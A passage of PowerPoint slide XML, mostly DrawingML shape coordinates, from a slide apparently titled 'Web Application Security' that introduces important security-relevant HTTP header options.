                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1519515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1471954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1424771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1377986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1331621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1285695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1240230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1195245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1150761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="1063378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="1020520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="978246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="936575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="895528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="855125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="815388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="776336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="737991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="700372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="663500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="627395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="592079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="557571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="523893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706831" y="491064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675762" y="459105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="428036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="397879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="368653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="340379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="313078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="286770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="261475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="237215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="214009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="191878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="170842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="150923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="132140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="114515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="98066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="82816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="68785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="55992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="44459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="34207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="25254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="17623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="11333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="6405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662913" y="2860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567433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95015" y="4750308"/>
              <a:ext cx="1254252" cy="12542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97371" y="306451"/>
            <a:ext cx="44608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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security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31996" y="1933193"/>
            <a:ext cx="859599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Some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most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important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security-relevant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header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options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are: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960177" y="3186239"/>
            <a:ext cx="4728210" cy="3302000"/>
            <a:chOff x="5960177" y="3186239"/>
            <a:chExt cx="4728210" cy="3302000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5964940" y="3191001"/>
              <a:ext cx="4211320" cy="3292475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4211320" h="3292475">
                  <a:moveTo>
                    <a:pt x="3726556" y="26797"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3758269" y="63903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3788891" y="101508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818425" y="139593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3846873" y="178141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874236" y="217134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900516" y="256555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3925715" y="296386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949834" y="336609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3972876" y="377207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994841" y="418162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4015732" y="459456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4035551" y="501073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4054298" y="542994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4071977" y="585202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4088588" y="627679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4104134" y="670408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4118616" y="713370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4132035" y="756550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4144394" y="799928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4155695" y="843487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4165939" y="887210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4175127" y="931080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183262" y="975077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4190346" y="1019186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196379" y="1063388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4201364" y="1107666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205303" y="1152001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4208197" y="1196378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4210048" y="1240777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4210858" y="1285182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4210628" y="1329574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209361" y="1373937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4207057" y="1418252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4203719" y="1462502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199349" y="1506670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4193948" y="1550738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4187518" y="1594687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4180060" y="1638502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4171577" y="1682163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4162070" y="1725654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4151541" y="1768957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4139991" y="1812053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127423" y="1854927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113838" y="1897560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4099237" y="1939934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4083624" y="1982032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4066998" y="2023836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4049363" y="2065330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4030720" y="2106494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011070" y="2147312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3990415" y="2187765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3968757" y="2227837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946099" y="2267510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922440" y="2306766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897784" y="2345588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3872132" y="2383957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3845485" y="2421857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817846" y="2459270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3789217" y="2496178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3759598" y="2532563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3728992" y="2568409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3697400" y="2603697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664824" y="2638410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3631266" y="2672530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596728" y="2706040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3561212" y="2738922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3524718" y="2771158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3487249" y="2802731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448807" y="2833624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410721" y="2862816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3372138" y="2891034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3333075" y="2918279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3293550" y="2944552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253578" y="2969855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213177" y="2994189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3172365" y="3017556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3131158" y="3039958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3089573" y="3061395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3047628" y="3081870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005339" y="3101384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2962723" y="3119938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919799" y="3137534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876581" y="3154174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833089" y="3169858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789338" y="3184590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745345" y="3198369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2701129" y="3211197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656706" y="3223077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2612092" y="3234009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567305" y="3243995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522363" y="3253037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477281" y="3261135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2432078" y="3268293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2386770" y="3274510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2341374" y="3279789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295907" y="3284131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250387" y="3287538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204830" y="3290011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159254" y="3291551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113675" y="3292161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068110" y="3291841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022577" y="3290594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1977093" y="3288420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931675" y="3285321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1886339" y="3281299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841104" y="3276356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795985" y="3270492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751000" y="3263709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1706166" y="3256009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661500" y="3247394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617019" y="3237864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1572740" y="3227421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1528681" y="3216067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484858" y="3203804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441288" y="3190632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397988" y="3176554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354976" y="3161570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312268" y="3145683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269882" y="3128894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227835" y="3111204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186143" y="3092615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144823" y="3073129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103894" y="3052746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063371" y="3031469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023272" y="3009299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983614" y="2986237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944414" y="2962285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905689" y="2937445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867456" y="2911718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829732" y="2885105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792534" y="2857608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755880" y="2829229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719786" y="2799968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684269" y="2769829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649346" y="2738811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615035" y="2706917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581353" y="2674148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548316" y="2640505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515941" y="2605991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484246" y="2570607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452591" y="2533555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="2495977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392494" y="2457891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364052" y="2419314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336681" y="2380265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310381" y="2340762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285152" y="2300823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260993" y="2260467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237905" y="2219711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215887" y="2178574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194938" y="2137073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175060" y="2095228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156251" y="2053055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138512" y="2010574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121842" y="1967802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106241" y="1924757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91709" y="1881458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78246" y="1837923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65852" y="1794170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54526" y="1750217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44268" y="1706083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35079" y="1661784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26958" y="1617340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19904" y="1572769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13919" y="1528089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9000" y="1483318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150" y="1438474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2366" y="1393575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1348639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1303685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="1258731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="1213795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4450" y="1168895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8066" y="1124049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12748" y="1079275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18496" y="1034592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25309" y="990017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33188" y="945569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42133" y="901266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52143" y="857127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63218" y="813168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75357" y="769409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88562" y="725867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102831" y="682561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118164" y="639509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134562" y="596728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152024" y="554238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170549" y="512056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190139" y="470201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210791" y="428690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232508" y="387541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255287" y="346774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279130" y="306405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304036" y="266454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330004" y="226938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357035" y="187875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385128" y="149284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414284" y="111183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444501" y="73590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475781" y="36523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508122" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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581388" y="4040123"/>
              <a:ext cx="1106805" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1106804" h="882650">
                  <a:moveTo>
                    <a:pt x="986535" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="119887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82011" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49103" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23144" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6116" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6116" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23144" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49103" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82011" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119887" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986535" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024412" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057320" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083279" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100307" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106423" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106423" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100307" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083279" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057320" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024412" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986535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9962768" y="4271010"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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68183" y="5806440"/>
            <a:ext cx="1106805" cy="882650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106804" h="882650">
                <a:moveTo>
                  <a:pt x="986536" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119888" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="735330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119888" y="882396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536" y="882396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="735330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="147066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536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948930" y="6038215"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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556503" y="4041647"/>
            <a:ext cx="1106805" cy="882650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106804" h="882650">
                <a:moveTo>
                  <a:pt x="986536" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119887" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="781836"/>
                </a:lnTo>
                <a:lnTo>
